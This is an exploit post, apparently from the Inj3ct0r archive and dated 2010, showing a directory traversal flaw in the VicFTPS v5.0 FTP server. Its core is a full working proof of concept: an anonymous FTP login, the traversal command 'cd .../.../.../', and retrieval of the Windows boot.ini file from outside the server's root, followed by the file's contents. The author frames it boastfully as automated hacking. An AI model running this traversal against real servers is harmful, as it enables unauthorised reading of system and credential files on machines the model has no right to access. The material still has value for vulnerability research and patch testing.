VicFTPS v5.0 Directory Traversal
Posted on 04 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>VicFTPS v5.0 Directory Traversal</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================ VicFTPS v5.0 Directory Traversal ================================ # Exploit Title: VicFTPS v5.0 Directory Traversal # Date: May 05, 2010 # Author: chr1x # Description: A simple FTP server for Windows. Does not require an install. Very simple to configure. Supports only one user connection at a time. Supports active and passive mode transfers, MDTM, SIZE, and PASS. Version 5.0 fixed CWD Buffer overflow vulnerability. <- A new vuln here! :D # Version: 5.0 # Tested on: Windows XP SP3 (Spanish Edition) #########<VULN CONFIRMATION>######################################### root@olovely:/ddpwn# ftp ftp> open (to) 192.168.1.64 Connected to 192.168.1.64. 220 VicFTPS ready Name (192.168.1.64:ninja): anonymous 331 pretend login accepted Password: 230 fake user logged in Remote system type is WIN32. ftp> ascii 200 Type set to I ftp> cd .../.../.../ 250 CWD command successful ftp> pwd 257 "/../../" ftp> get boot.ini local: boot.ini remote: boot.ini 200 PORT command successful 150 Opening BINARY mode data connection 226 Transfer Complete 211 bytes received in 0.00 secs (92.1 kB/s) ftp> bye 221 goodbye root@olovely:/ddpwn# cat boot.ini [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect root@olovely:/ddpwn# #########</VULN CONFIRMATION>######################################### Shot from DDPwNv1.0 [*] Testing Path: .../.../.../ <- VULNERABLE! :P Thiz v00d00 t00l just r0x! Ninjutzu automated hacking babe! lol. http://chr1x.sectester.net # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>